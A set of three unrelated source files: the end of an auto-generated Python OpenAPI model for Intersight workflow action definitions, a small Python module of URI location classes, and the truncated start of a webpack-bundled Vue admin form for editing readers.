'STORAGE.PUREVOLUME': "storage.PureVolume",
'STORAGE.PUREVOLUMESNAPSHOT': "storage.PureVolumeSnapshot",
'STORAGE.SASEXPANDER': "storage.SasExpander",
'STORAGE.SASPORT': "storage.SasPort",
'STORAGE.SPAN': "storage.Span",
'STORAGE.STORAGEPOLICY': "storage.StoragePolicy",
'STORAGE.VDMEMBEREP': "storage.VdMemberEp",
'STORAGE.VIRTUALDRIVE': "storage.VirtualDrive",
'STORAGE.VIRTUALDRIVECONTAINER': "storage.VirtualDriveContainer",
'STORAGE.VIRTUALDRIVEEXTENSION': "storage.VirtualDriveExtension",
'STORAGE.VIRTUALDRIVEIDENTITY': "storage.VirtualDriveIdentity",
'SYSLOG.POLICY': "syslog.Policy",
'TAM.ADVISORYCOUNT': "tam.AdvisoryCount",
'TAM.ADVISORYDEFINITION': "tam.AdvisoryDefinition",
'TAM.ADVISORYINFO': "tam.AdvisoryInfo",
'TAM.ADVISORYINSTANCE': "tam.AdvisoryInstance",
'TAM.SECURITYADVISORY': "tam.SecurityAdvisory",
'TASK.HITACHISCOPEDINVENTORY': "task.HitachiScopedInventory",
'TASK.HYPERFLEXSCOPEDINVENTORY': "task.HyperflexScopedInventory",
'TASK.IWESCOPEDINVENTORY': "task.IweScopedInventory",
'TASK.NETAPPSCOPEDINVENTORY': "task.NetAppScopedInventory",
'TASK.PUBLICCLOUDSCOPEDINVENTORY': "task.PublicCloudScopedInventory",
'TASK.PURESCOPEDINVENTORY': "task.PureScopedInventory",
'TASK.SERVERSCOPEDINVENTORY': "task.ServerScopedInventory",
'TECHSUPPORTMANAGEMENT.COLLECTIONCONTROLPOLICY': "techsupportmanagement.CollectionControlPolicy",
'TECHSUPPORTMANAGEMENT.DOWNLOAD': "techsupportmanagement.Download",
'TECHSUPPORTMANAGEMENT.TECHSUPPORTBUNDLE': "techsupportmanagement.TechSupportBundle",
'TECHSUPPORTMANAGEMENT.TECHSUPPORTSTATUS': "techsupportmanagement.TechSupportStatus",
'TERMINAL.AUDITLOG': "terminal.AuditLog",
'TERRAFORM.EXECUTOR': "terraform.Executor",
'THERMAL.POLICY': "thermal.Policy",
'TOP.SYSTEM': "top.System",
'UCSD.BACKUPINFO': "ucsd.BackupInfo",
'UUIDPOOL.BLOCK': "uuidpool.Block",
'UUIDPOOL.POOL': "uuidpool.Pool",
'UUIDPOOL.POOLMEMBER': "uuidpool.PoolMember",
'UUIDPOOL.UNIVERSE': "uuidpool.Universe",
'UUIDPOOL.UUIDLEASE': "uuidpool.UuidLease",
'VIRTUALIZATION.CISCOHYPERVISORMANAGER': "virtualization.CiscoHypervisorManager",
'VIRTUALIZATION.ESXICONSOLE': "virtualization.EsxiConsole",
'VIRTUALIZATION.HOST': "virtualization.Host",
'VIRTUALIZATION.IWECLUSTER': "virtualization.IweCluster",
'VIRTUALIZATION.IWEDATACENTER': "virtualization.IweDatacenter",
'VIRTUALIZATION.IWEDVUPLINK': "virtualization.IweDvUplink",
'VIRTUALIZATION.IWEDVSWITCH': "virtualization.IweDvswitch",
'VIRTUALIZATION.IWEHOST': "virtualization.IweHost",
'VIRTUALIZATION.IWEHOSTINTERFACE': "virtualization.IweHostInterface",
'VIRTUALIZATION.IWEHOSTVSWITCH': "virtualization.IweHostVswitch",
'VIRTUALIZATION.IWENETWORK': "virtualization.IweNetwork",
'VIRTUALIZATION.IWEVIRTUALDISK': "virtualization.IweVirtualDisk",
'VIRTUALIZATION.IWEVIRTUALMACHINE': "virtualization.IweVirtualMachine",
'VIRTUALIZATION.IWEVIRTUALMACHINENETWORKINTERFACE': "virtualization.IweVirtualMachineNetworkInterface",
'VIRTUALIZATION.VIRTUALDISK': "virtualization.VirtualDisk",
'VIRTUALIZATION.VIRTUALMACHINE': "virtualization.VirtualMachine",
'VIRTUALIZATION.VIRTUALNETWORK': "virtualization.VirtualNetwork",
'VIRTUALIZATION.VMWARECLUSTER': "virtualization.VmwareCluster",
'VIRTUALIZATION.VMWAREDATACENTER': "virtualization.VmwareDatacenter",
'VIRTUALIZATION.VMWAREDATASTORE': "virtualization.VmwareDatastore",
'VIRTUALIZATION.VMWAREDATASTORECLUSTER': "virtualization.VmwareDatastoreCluster",
'VIRTUALIZATION.VMWAREDISTRIBUTEDNETWORK': "virtualization.VmwareDistributedNetwork",
'VIRTUALIZATION.VMWAREDISTRIBUTEDSWITCH': "virtualization.VmwareDistributedSwitch",
'VIRTUALIZATION.VMWAREFOLDER': "virtualization.VmwareFolder",
'VIRTUALIZATION.VMWAREHOST': "virtualization.VmwareHost",
'VIRTUALIZATION.VMWAREKERNELNETWORK': "virtualization.VmwareKernelNetwork",
'VIRTUALIZATION.VMWARENETWORK': "virtualization.VmwareNetwork",
'VIRTUALIZATION.VMWAREPHYSICALNETWORKINTERFACE': "virtualization.VmwarePhysicalNetworkInterface",
'VIRTUALIZATION.VMWAREUPLINKPORT': "virtualization.VmwareUplinkPort",
'VIRTUALIZATION.VMWAREVCENTER': "virtualization.VmwareVcenter",
'VIRTUALIZATION.VMWAREVIRTUALDISK': "virtualization.VmwareVirtualDisk",
'VIRTUALIZATION.VMWAREVIRTUALMACHINE': "virtualization.VmwareVirtualMachine",
'VIRTUALIZATION.VMWAREVIRTUALMACHINESNAPSHOT': "virtualization.VmwareVirtualMachineSnapshot",
'VIRTUALIZATION.VMWAREVIRTUALNETWORKINTERFACE': "virtualization.VmwareVirtualNetworkInterface",
'VIRTUALIZATION.VMWAREVIRTUALSWITCH': "virtualization.VmwareVirtualSwitch",
'VMEDIA.POLICY': "vmedia.Policy",
'VMRC.CONSOLE': "vmrc.Console",
'VNC.CONSOLE': "vnc.Console",
'VNIC.ETHADAPTERPOLICY': "vnic.EthAdapterPolicy",
'VNIC.ETHIF': "vnic.EthIf",
'VNIC.ETHNETWORKPOLICY': "vnic.EthNetworkPolicy",
'VNIC.ETHQOSPOLICY': "vnic.EthQosPolicy",
'VNIC.FCADAPTERPOLICY': "vnic.FcAdapterPolicy",
'VNIC.FCIF': "vnic.FcIf",
'VNIC.FCNETWORKPOLICY': "vnic.FcNetworkPolicy",
'VNIC.FCQOSPOLICY': "vnic.FcQosPolicy",
'VNIC.ISCSIADAPTERPOLICY': "vnic.IscsiAdapterPolicy",
'VNIC.ISCSIBOOTPOLICY': "vnic.IscsiBootPolicy",
'VNIC.ISCSISTATICTARGETPOLICY': "vnic.IscsiStaticTargetPolicy",
'VNIC.LANCONNECTIVITYPOLICY': "vnic.LanConnectivityPolicy",
'VNIC.LCPSTATUS': "vnic.LcpStatus",
'VNIC.SANCONNECTIVITYPOLICY': "vnic.SanConnectivityPolicy",
'VNIC.SCPSTATUS': "vnic.ScpStatus",
'VRF.VRF': "vrf.Vrf",
'WORKFLOW.ANSIBLEBATCHEXECUTOR': "workflow.AnsibleBatchExecutor",
'WORKFLOW.BATCHAPIEXECUTOR': "workflow.BatchApiExecutor",
'WORKFLOW.BUILDTASKMETA': "workflow.BuildTaskMeta",
'WORKFLOW.BUILDTASKMETAOWNER': "workflow.BuildTaskMetaOwner",
'WORKFLOW.CATALOG': "workflow.Catalog",
'WORKFLOW.CUSTOMDATATYPEDEFINITION': "workflow.CustomDataTypeDefinition",
'WORKFLOW.ERRORRESPONSEHANDLER': "workflow.ErrorResponseHandler",
'WORKFLOW.PENDINGDYNAMICWORKFLOWINFO': "workflow.PendingDynamicWorkflowInfo",
'WORKFLOW.ROLLBACKWORKFLOW': "workflow.RollbackWorkflow",
'WORKFLOW.SOLUTIONACTIONDEFINITION': "workflow.SolutionActionDefinition",
'WORKFLOW.SOLUTIONACTIONINSTANCE': "workflow.SolutionActionInstance",
'WORKFLOW.SOLUTIONDEFINITION': "workflow.SolutionDefinition",
'WORKFLOW.SOLUTIONINSTANCE': "workflow.SolutionInstance",
'WORKFLOW.SOLUTIONOUTPUT': "workflow.SolutionOutput",
'WORKFLOW.SSHBATCHEXECUTOR': "workflow.SshBatchExecutor",
'WORKFLOW.TASKDEBUGLOG': "workflow.TaskDebugLog",
'WORKFLOW.TASKDEFINITION': "workflow.TaskDefinition",
'WORKFLOW.TASKINFO': "workflow.TaskInfo",
'WORKFLOW.TASKMETADATA': "workflow.TaskMetadata",
'WORKFLOW.TASKNOTIFICATION': "workflow.TaskNotification",
'WORKFLOW.TEMPLATEEVALUATION': "workflow.TemplateEvaluation",
'WORKFLOW.TEMPLATEFUNCTIONMETA': "workflow.TemplateFunctionMeta",
'WORKFLOW.WORKFLOWDEFINITION': "workflow.WorkflowDefinition",
'WORKFLOW.WORKFLOWINFO': "workflow.WorkflowInfo",
'WORKFLOW.WORKFLOWMETA': "workflow.WorkflowMeta",
'WORKFLOW.WORKFLOWMETADATA': "workflow.WorkflowMetadata",
'WORKFLOW.WORKFLOWNOTIFICATION': "workflow.WorkflowNotification",
},
}
validations = {
('label',): {
'regex': {
'pattern': r'^[a-zA-Z0-9]+[\sa-zA-Z0-9_.:-]{1,92}$', # noqa: E501
},
},
('name',): {
'regex': {
'pattern': r'^[a-zA-Z0-9_.:-]{1,64}$', # noqa: E501
},
},
('periodicity',): {
'inclusive_maximum': 604800,
'inclusive_minimum': 0,
},
}
@cached_property
def additional_properties_type():
"""
This must be a method because a model may have properties that are
of type self, this must run after the class is loaded
"""
lazy_import()
return (bool, date, datetime, dict, float, int, list, str, none_type,) # noqa: E501
_nullable = False
@cached_property
def openapi_types():
"""
This must be a method because a model may have properties that are
of type self, this must run after the class is loaded
Returns
openapi_types (dict): The key is attribute name
and the value is attribute type.
"""
lazy_import()
return {
'class_id': (str,), # noqa: E501
'moid': (str,), # noqa: E501
'selector': (str,), # noqa: E501
'link': (str,), # noqa: E501
'account_moid': (str,), # noqa: E501
'create_time': (datetime,), # noqa: E501
'domain_group_moid': (str,), # noqa: E501
'mod_time': (datetime,), # noqa: E501
'owners': ([str], none_type,), # noqa: E501
'shared_scope': (str,), # noqa: E501
'tags': ([MoTag], none_type,), # noqa: E501
'version_context': (MoVersionContext,), # noqa: E501
'ancestors': ([MoBaseMoRelationship], none_type,), # noqa: E501
'parent': (MoBaseMoRelationship,), # noqa: E501
'permission_resources': ([MoBaseMoRelationship], none_type,), # noqa: E501
'display_names': (DisplayNames,), # noqa: E501
'action_type': (str,), # noqa: E501
'allowed_instance_states': ([str], none_type,), # noqa: E501
'core_workflows': ([WorkflowActionWorkflowDefinition], none_type,), # noqa: E501
'description': (str,), # noqa: E501
'input_definition': ([WorkflowBaseDataType], none_type,), # noqa: E501
'label': (str,), # noqa: E501
'name': (str,), # noqa: E501
'output_parameters': (bool, date, datetime, dict, float, int, list, str, none_type,), # noqa: E501
'periodicity': (int,), # noqa: E501
'post_core_workflows': ([WorkflowActionWorkflowDefinition], none_type,), # noqa: E501
'pre_core_workflows': ([WorkflowActionWorkflowDefinition], none_type,), # noqa: E501
'stop_workflows': ([WorkflowActionWorkflowDefinition], none_type,), # noqa: E501
'validation_information': (WorkflowValidationInformation,), # noqa: E501
'validation_workflows': ([WorkflowActionWorkflowDefinition], none_type,), # noqa: E501
'solution_definition': (WorkflowSolutionDefinitionRelationship,), # noqa: E501
'workflow_definition': (WorkflowWorkflowDefinitionRelationship,), # noqa: E501
'object_type': (str,), # noqa: E501
}
@cached_property
def discriminator():
lazy_import()
val = {
'mo.MoRef': MoMoRef,
'workflow.SolutionActionDefinition': WorkflowSolutionActionDefinition,
}
if not val:
return None
return {'class_id': val}
attribute_map = {
'class_id': 'ClassId', # noqa: E501
'moid': 'Moid', # noqa: E501
'selector': 'Selector', # noqa: E501
'link': 'link', # noqa: E501
'account_moid': 'AccountMoid', # noqa: E501
'create_time': 'CreateTime', # noqa: E501
'domain_group_moid': 'DomainGroupMoid', # noqa: E501
'mod_time': 'ModTime', # noqa: E501
'owners': 'Owners', # noqa: E501
'shared_scope': 'SharedScope', # noqa: E501
'tags': 'Tags', # noqa: E501
'version_context': 'VersionContext', # noqa: E501
'ancestors': 'Ancestors', # noqa: E501
'parent': 'Parent', # noqa: E501
'permission_resources': 'PermissionResources', # noqa: E501
'display_names': 'DisplayNames', # noqa: E501
'action_type': 'ActionType', # noqa: E501
'allowed_instance_states': 'AllowedInstanceStates', # noqa: E501
'core_workflows': 'CoreWorkflows', # noqa: E501
'description': 'Description', # noqa: E501
'input_definition': 'InputDefinition', # noqa: E501
'label': 'Label', # noqa: E501
'name': 'Name', # noqa: E501
'output_parameters': 'OutputParameters', # noqa: E501
'periodicity': 'Periodicity', # noqa: E501
'post_core_workflows': 'PostCoreWorkflows', # noqa: E501
'pre_core_workflows': 'PreCoreWorkflows', # noqa: E501
'stop_workflows': 'StopWorkflows', # noqa: E501
'validation_information': 'ValidationInformation', # noqa: E501
'validation_workflows': 'ValidationWorkflows', # noqa: E501
'solution_definition': 'SolutionDefinition', # noqa: E501
'workflow_definition': 'WorkflowDefinition', # noqa: E501
'object_type': 'ObjectType', # noqa: E501
}
required_properties = set([
'_data_store',
'_check_type',
'_spec_property_naming',
'_path_to_item',
'_configuration',
'_visited_composed_classes',
'_composed_instances',
'_var_name_to_model_instances',
'_additional_properties_model_instances',
])
@convert_js_args_to_python_args
def __init__(self, *args, **kwargs): # noqa: E501
"""WorkflowSolutionActionDefinitionRelationship - a model defined in OpenAPI
Args:
Keyword Args:
class_id (str): The fully-qualified name of the instantiated, concrete type. This property is used as a discriminator to identify the type of the payload when marshaling and unmarshaling data.. defaults to "mo.MoRef", must be one of ["mo.MoRef", ] # noqa: E501
_check_type (bool): if True, values for parameters in openapi_types
will be type checked and a TypeError will be
raised if the wrong type is input.
Defaults to True
_path_to_item (tuple/list): This is a list of keys or values to
drill down to the model in received_data
when deserializing a response
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_configuration (Configuration): the instance to use when
deserializing a file_type parameter.
If passed, type conversion is attempted
If omitted no type conversion is done.
_visited_composed_classes (tuple): This stores a tuple of
classes that we have traveled through so that
if we see that class again we will not use its
discriminator again.
When traveling through a discriminator, the
composed schema that is
is traveled through is added to this set.
For example if Animal has a discriminator
petType and we pass in "Dog", and the class Dog
allOf includes Animal, we move through Animal
once using the discriminator, and pick Dog.
Then in Dog, we will make an instance of the
Animal class but this time we won't travel
through its discriminator because we passed in
_visited_composed_classes = (Animal,)
moid (str): The Moid of the referenced REST resource.. [optional] # noqa: E501
selector (str): An OData $filter expression which describes the REST resource to be referenced. This field may be set instead of 'moid' by clients. 1. If 'moid' is set this field is ignored. 1. If 'selector' is set and 'moid' is empty/absent from the request, Intersight determines the Moid of the resource matching the filter expression and populates it in the MoRef that is part of the object instance being inserted/updated to fulfill the REST request. An error is returned if the filter matches zero or more than one REST resource. An example filter string is: Serial eq '3AA8B7T11'.. [optional] # noqa: E501
link (str): A URL to an instance of the 'mo.MoRef' class.. [optional] # noqa: E501
account_moid (str): The Account ID for this managed object.. [optional] # noqa: E501
create_time (datetime): The time when this managed object was created.. [optional] # noqa: E501
domain_group_moid (str): The DomainGroup ID for this managed object.. [optional] # noqa: E501
mod_time (datetime): The time when this managed object was last modified.. [optional] # noqa: E501
owners ([str], none_type): [optional] # noqa: E501
shared_scope (str): Intersight provides pre-built workflows, tasks and policies to end users through global catalogs. Objects that are made available through global catalogs are said to have a 'shared' ownership. Shared objects are either made globally available to all end users or restricted to end users based on their license entitlement. Users can use this property to differentiate the scope (global or a specific license tier) to which a shared MO belongs.. [optional] # noqa: E501
tags ([MoTag], none_type): [optional] # noqa: E501
version_context (MoVersionContext): [optional] # noqa: E501
ancestors ([MoBaseMoRelationship], none_type): An array of relationships to moBaseMo resources.. [optional] # noqa: E501
parent (MoBaseMoRelationship): [optional] # noqa: E501
permission_resources ([MoBaseMoRelationship], none_type): An array of relationships to moBaseMo resources.. [optional] # noqa: E501
display_names (DisplayNames): [optional] # noqa: E501
action_type (str): Type of actionDefinition which decides on how to trigger the action. * `External` - External actions definition can be triggered by enduser to perform actions on the solution. Once action is completed successfully (eg. create/deploy), user cannot re-trigger that action again. * `Internal` - Internal action definition is used to trigger periodic actions on the solution instance. * `Repetitive` - Repetitive action definition is an external action that can be triggered by enduser to perform repetitive actions (eg. Edit/Update/Perform health check) on the created solution.. [optional] if omitted the server will use the default value of "External" # noqa: E501
allowed_instance_states ([str], none_type): [optional] # noqa: E501
core_workflows ([WorkflowActionWorkflowDefinition], none_type): [optional] # noqa: E501
description (str): The description for this action which provides information on what are the pre-requisites to use this action on the solution and what features are supported by this action.. [optional] # noqa: E501
input_definition ([WorkflowBaseDataType], none_type): [optional] # noqa: E501
label (str): A user friendly short name to identify the action. Name can only contain letters (a-z, A-Z), numbers (0-9), hyphen (-), period (.), colon (:), space ( ) or an underscore (_).. [optional] # noqa: E501
name (str): The name for this action definition. Name can only contain letters (a-z, A-Z), numbers (0-9), hyphen (-), period (.), colon (:) or an underscore (_). Name of the action must be unique within a solution definition.. [optional] # noqa: E501
output_parameters (bool, date, datetime, dict, float, int, list, str, none_type): The output mappings from workflows in the action definition to the solution output definition. Any output from core or post-core workflow can be mapped to solution output definition. The output can be referred using the name of the workflow definition and the output name in the following format '${<ActionWorkflowDefinition.Name>.output.<outputName>'.. [optional] # noqa: E501
periodicity (int): Value in seconds to specify the periodicity of the workflows. A zero value indicate the workflow will not execute periodically. A non-zero value indicate, the workflow will be executed periodically with this periodicity.. [optional] # noqa: E501
post_core_workflows ([WorkflowActionWorkflowDefinition], none_type): [optional] # noqa: E501
pre_core_workflows ([WorkflowActionWorkflowDefinition], none_type): [optional] # noqa: E501
stop_workflows ([WorkflowActionWorkflowDefinition], none_type): [optional] # noqa: E501
validation_information (WorkflowValidationInformation): [optional] # noqa: E501
validation_workflows ([WorkflowActionWorkflowDefinition], none_type): [optional] # noqa: E501
solution_definition (WorkflowSolutionDefinitionRelationship): [optional] # noqa: E501
workflow_definition (WorkflowWorkflowDefinitionRelationship): [optional] # noqa: E501
object_type (str): The fully-qualified name of the remote type referred by this relationship.. [optional] # noqa: E501
"""
class_id = kwargs.get('class_id', "mo.MoRef")
_check_type = kwargs.pop('_check_type', True)
_spec_property_naming = kwargs.pop('_spec_property_naming', False)
_path_to_item = kwargs.pop('_path_to_item', ())
_configuration = kwargs.pop('_configuration', None)
_visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
if args:
raise ApiTypeError(
"Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments." % (
args,
self.__class__.__name__,
),
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
self._visited_composed_classes = _visited_composed_classes + (self.__class__,)
constant_args = {
'_check_type': _check_type,
'_path_to_item': _path_to_item,
'_spec_property_naming': _spec_property_naming,
'_configuration': _configuration,
'_visited_composed_classes': self._visited_composed_classes,
}
required_args = {
'class_id': class_id,
}
model_args = {}
model_args.update(required_args)
model_args.update(kwargs)
composed_info = validate_get_composed_info(
constant_args, model_args, self)
self._composed_instances = composed_info[0]
self._var_name_to_model_instances = composed_info[1]
self._additional_properties_model_instances = composed_info[2]
unused_args = composed_info[3]
for var_name, var_value in required_args.items():
setattr(self, var_name, var_value)
for var_name, var_value in kwargs.items():
if var_name in unused_args and \
self._configuration is not None and \
self._configuration.discard_unknown_keys and \
not self._additional_properties_model_instances:
# discard variable.
continue
setattr(self, var_name, var_value)
@cached_property
def _composed_schemas():
# we need this here to make our import statements work
# we must store _composed_schemas in here so the code is only run
# when we invoke this method. If we kept this at the class
# level we would get an error beause the class level
# code would be run when this module is imported, and these composed
# classes don't exist yet because their module has not finished
# loading
lazy_import()
return {
'anyOf': [
],
'allOf': [
],
'oneOf': [
MoMoRef,
WorkflowSolutionActionDefinition,
none_type,
],
}
|
from abc import ABCMeta, abstractmethod
import typing as t
__all__ = []
class FlexibleLocation(metaclass=ABCMeta):
"""Base class of flexible location.
Location is concept representing each pieces of path of URI, i.e.
locations can configures a path of URI by joining them with
separator `/`.
Location has type of `str` or subclasses of this class. If a location
is `str`, then the location is called a static location. Otherwise,
the location is called a flexible location. Flexible locations means
location with some kind of logical rules of strings. The logic of rules
can be implemented on `is_valid` method, returning if specified string
is valid in the rules.
"""
@abstractmethod
def is_valid(self, loc: str) -> bool:
pass
def __str__(self) -> str:
return self.__class__.__name__
Location_t = t.Union[str, FlexibleLocation]
StaticLocation_t = str
Uri_t = t.Tuple[Location_t, ...]
def is_flexible_uri(uri: Uri_t) -> bool:
"""Judge if specified `uri` has one or more flexible location.
Args:
uri: URI pattern to be judged.
Returns:
True if specified `uri` has one or more flexible location,
False otherwise.
"""
for loc in uri:
if isinstance(loc, FlexibleLocation):
return True
return False
def is_duplicated_uri(uri_1: Uri_t, uri_2: Uri_t) -> bool:
"""Judge if a couple of specified URI patterns has same pattern.
Args:
uri_1: URI pattern to be judged
uri_2: URI pattern to be judged
Returns:
True if two URIs has same pattern, False otherwise.
"""
if len(uri_1) == len(uri_2):
for loc_1, loc_2 in zip(uri_1, uri_2):
if isinstance(loc_1, FlexibleLocation):
continue
if isinstance(loc_2, FlexibleLocation):
continue
if loc_1 != loc_2:
break
else:
return True
return False
class AsciiDigitLocation(FlexibleLocation):
"""Flexible location representing location of number in ASCII code.
"""
def __init__(self, digits: int) -> None:
"""
Args:
digits: Number of digits which the location accepts.
Raises:
ValueError: Raised if `digits` is 0 or less.
"""
if digits < 1:
raise ValueError("'digits' must be bigger than 0.")
self._digits = digits
def is_valid(self, loc: str) -> bool:
"""Judge if specified `loc` is valid location or not.
Args:
loc: Location to be judged.
Returns:
True if specified location is valid, False otherwise.
"""
return loc.isascii() and loc.isdigit() and len(loc) == self._digits
class AnyStringLocation(FlexibleLocation):
"""Flexible location representing string with no rules.
"""
def __init__(self, max: t.Optional[int] = None) -> None:
"""
Note:
If the argument `max` is `None`, then any length of string
will be accepted.
Args:
max: Max length of string of location.
Raises:
ValueError: Raised if `max` is 0 or less.
"""
if max and max < 1:
raise ValueError("'max' must be bigger than 0.")
self._max = max
def is_valid(self, loc: str) -> bool:
"""Judge if specified `loc` is valid location or not.
Args:
loc: Location to be judged.
Returns:
True if specified location is valid, False otherwise.
"""
if self._max is None:
return True
len_loc = len(loc)
if len_loc > self._max or len_loc == 0:
return False
return True
|
(window["webpackJsonp"] = window["webpackJsonp"] || []).push([[30],{
/***/ "./node_modules/babel-loader/lib/index.js?!./node_modules/vue-loader/lib/index.js?!./resources/js/pages/admin/reader/reader-form.vue?vue&type=script&lang=js&":
/*!******************************************************************************************************************************************************************************!*\
!*** ./node_modules/babel-loader/lib??ref--4-0!./node_modules/vue-loader/lib??vue-loader-options!./resources/js/pages/admin/reader/reader-form.vue?vue&type=script&lang=js& ***!
\******************************************************************************************************************************************************************************/
/*! exports provided: default */
/***/ (function(module, __webpack_exports__, __webpack_require__) {
"use strict";
eval("__webpack_require__.r(__webpack_exports__);\n/* harmony import */ var _babel_runtime_regenerator__WEBPACK_IMPORTED_MODULE_0__ = __webpack_require__(/*! @babel/runtime/regenerator */ \"./node_modules/@babel/runtime/regenerator/index.js\");\n/* harmony import */ var _babel_runtime_regenerator__WEBPACK_IMPORTED_MODULE_0___default = /*#__PURE__*/__webpack_require__.n(_babel_runtime_regenerator__WEBPACK_IMPORTED_MODULE_0__);\n/* harmony import */ var vform__WEBPACK_IMPORTED_MODULE_1__ = __webpack_require__(/*! vform */ \"./node_modules/vform/dist/vform.common.js\");\n/* harmony import */ var vform__WEBPACK_IMPORTED_MODULE_1___default = /*#__PURE__*/__webpack_require__.n(vform__WEBPACK_IMPORTED_MODULE_1__);\n/* harmony import */ var vuex__WEBPACK_IMPORTED_MODULE_2__ = __webpack_require__(/*! vuex */ \"./node_modules/vuex/dist/vuex.esm.js\");\n/* harmony import */ var _helpers__WEBPACK_IMPORTED_MODULE_3__ = __webpack_require__(/*! ~/helpers */ \"./resources/js/helpers/index.js\");\n/* harmony import */ var sweetalert2__WEBPACK_IMPORTED_MODULE_4__ = __webpack_require__(/*! sweetalert2 */ \"./node_modules/sweetalert2/dist/sweetalert2.all.js\");\n/* harmony import */ var sweetalert2__WEBPACK_IMPORTED_MODULE_4___default = /*#__PURE__*/__webpack_require__.n(sweetalert2__WEBPACK_IMPORTED_MODULE_4__);\n/* harmony import */ var primevue_inputswitch__WEBPACK_IMPORTED_MODULE_5__ = __webpack_require__(/*! primevue/inputswitch */ \"./node_modules/primevue/inputswitch/index.js\");\n/* harmony import */ var primevue_inputswitch__WEBPACK_IMPORTED_MODULE_5___default = /*#__PURE__*/__webpack_require__.n(primevue_inputswitch__WEBPACK_IMPORTED_MODULE_5__);\n/* harmony import */ var vue_birth_datepicker_src_birth_datepicker__WEBPACK_IMPORTED_MODULE_6__ = __webpack_require__(/*! vue-birth-datepicker/src/birth-datepicker */ \"./node_modules/vue-birth-datepicker/src/birth-datepicker.vue\");\n\n\nfunction asyncGeneratorStep(gen, resolve, reject, _next, _throw, key, arg) { try { var info = gen[key](arg); var value = info.value; } catch (error) { reject(error); return; } if (info.done) { resolve(value); } else { Promise.resolve(value).then(_next, _throw); } }\n\nfunction _asyncToGenerator(fn) { return function () { var self = this, args = arguments; return new Promise(function (resolve, reject) { var gen = fn.apply(self, args); function _next(value) { asyncGeneratorStep(gen, resolve, reject, _next, _throw, \"next\", value); } function _throw(err) { asyncGeneratorStep(gen, resolve, reject, _next, _throw, \"throw\", err); } _next(undefined); }); }; }\n\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n\n\n\n\n\n\n/* harmony default export */ __webpack_exports__[\"default\"] = ({\n scrollToTop: false,\n metaInfo: function metaInfo() {\n return {\n title: this.$t('settings')\n };\n },\n components: {\n InputSwitch: primevue_inputswitch__WEBPACK_IMPORTED_MODULE_5___default.a,\n birthDatepicker: vue_birth_datepicker_src_birth_datepicker__WEBPACK_IMPORTED_MODULE_6__[\"default\"]\n },\n data: function data() {\n return {\n isUpdating: false,\n isAdditionalUpdating: false,\n sync_banned: false,\n sync_visible: false,\n sync_approved: false,\n genders: [{\n id: 0,\n name: 'Male'\n }, {\n id: 1,\n name: 'Female'\n }, {\n id: 2,\n name: 'Other'\n }]\n };\n },\n computed: Object(vuex__WEBPACK_IMPORTED_MODULE_2__[\"mapGetters\"])({\n user: 'auth/user',\n readerForm: 'admin-reader/readerForm',\n additionalForm: 'admin-reader/additionalForm',\n is_banned: 'admin-reader/is_banned',\n visible: 'admin-reader/visible'\n }),\n beforeMount: function beforeMount() {\n var _this = this;\n\n var id = this.$route.params.id;\n this.$store.dispatch(\"admin-reader/viewReader\", id).then(function () {\n console.log(_this.readerForm.is_banned);\n _this.sync_banned = _this.readerForm.is_banned === 1 ? true : false;\n console.log(_this.sync_banned);\n _this.sync_visible = _this.readerForm.visible === 1 ? true : false;\n _this.sync_approved = _this.readerForm.is_approved === \"APPROVED\" ? true : false;\n });\n this.$store.dispatch(\"admin-reader/viewAdditional\", id).then(function () {\n console.log(_this.additionalForm);\n });\n },\n methods: {\n update: function update() {\n var _this2 = this;\n\n return _asyncToGenerator( /*#__PURE__*/_babel_runtime_regenerator__WEBPACK_IMPORTED_MODULE_0___default.a.mark(function _callee() {\n return _babel_runtime_regenerator__WEBPACK_IMPORTED_MODULE_0___default.a.wrap(function _callee$(_context) {\n while (1) {\n switch (_context.prev = _context.next) {\n case 0:\n sweetalert2__WEBPACK_IMPORTED_MODULE_4___default.a.fire({\n title: 'Are you sure?',\n text: \"You are about to update this reader\",\n icon: 'warning',\n showCancelButton: true,\n confirmButtonColor: '#3085d6',\n cancelButtonColor: '#d33',\n confirmButtonText: 'Confirm'\n }).then(function (result) {\n console.log(result.value);\n\n if (result.value) {\n console.log(_this2.sync_banned);\n if (_this2.sync_banned == 0 || _this2.sync_banned == false) _this2.readerForm.is_banned = 0;else if (_this2.sync_banned == 1 || _this2.sync_banned == true) _this2.readerForm.is_banned = 1;\n console.log(_this2.visible);\n if (_this2.sync_visible == 1 || _this2.sync_visible == true) _this2.readerForm.visible = 1;else if (_this2.sync_visible == 0 || _this2.sync_visible == false) _this2.visible = 0;\n if (_this2.sync_approved == 0 || _this2.sync_approved == false) _this2.readerForm.is_approved = \"REJECTED\";else if (_this2.sync_approved == 1 || _this2.sync_approved == true) 